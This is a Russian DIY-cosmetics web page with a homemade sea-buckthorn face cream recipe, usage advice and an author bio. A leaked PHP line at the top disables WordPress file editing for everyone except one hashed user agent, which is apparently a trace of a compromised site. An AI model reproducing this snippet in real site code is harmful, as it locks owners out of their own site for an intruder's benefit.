if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Рецепт, как сделать крем для лица с лифтинг-эффектом своими руками | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Рецепт, как сделать крем для лица с лифтинг-эффектом своими руками

Крем, сделанный в домашних условиях, который способствует лифтингу и питанию

Крем, сде­лан­ный в домаш­них усло­ви­ях, кото­рый спо­соб­ству­ет лиф­тин­гу и питанию.

Вам понадобится :

  • замо­ро­жен­ные яго­ды обле­пи­хи 3ст.л;
  • мас­ло вино­град­ных косто­чек ½ ч.л;
  • маточ­ное молоч­ко (2–3 капли);
  • вита­мин А (2 капли);
  • вита­мин В (2 капли).

Приготовление

Нату­раль­ная кос­ме­ти­ка сво­и­ми рука­ми пода­рит вам мно­же­ство при­ят­ных впе­чат­ле­ний и ощу­ще­ний. Для при­го­тов­ле­ния дан­но­го кре­ма вам необ­хо­ди­мо замо­ро­жен­ные яго­ды обле­пи­хи ошпа­рить кипят­ком. Затем поло­жить эти яго­ды в блен­дер или мик­сер и пере­мо­лоть, до обра­зо­ва­ния мяко­ти и сока. В при­го­тов­лен­ную мас­су необ­хо­ди­мо доба­вить ½ ч.л мас­ла вино­град­ных косто­чек и все хоро­шо перемешать.
Сле­ду­ю­щим шагом будет добав­ле­ние необ­хо­ди­мо­го коли­че­ства вита­ми­на А и В, и маточ­но­го молочка.

Использование

Дан­ный крем для лица мож­но исполь­зо­вать до 2 раз в неде­лю. Для это­го на очи­щен­ную кожу необ­хо­ди­мо нане­сти этот крем при­бли­зи­тель­но на 10 минут. После это­го лицо необ­хо­ди­мо умыть теп­лой водой. Для удоб­но­го нане­се­ния дан­но­го кре­ма спе­ци­а­ли­сты реко­мен­ду­ют сме­шать 2ст. л полу­чен­ной мас­сы с 50 мл дет­ско­го кре­ма. Хра­нить этот крем необ­хо­ди­мо в холо­диль­ни­ке мож­но до 1 месяца.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!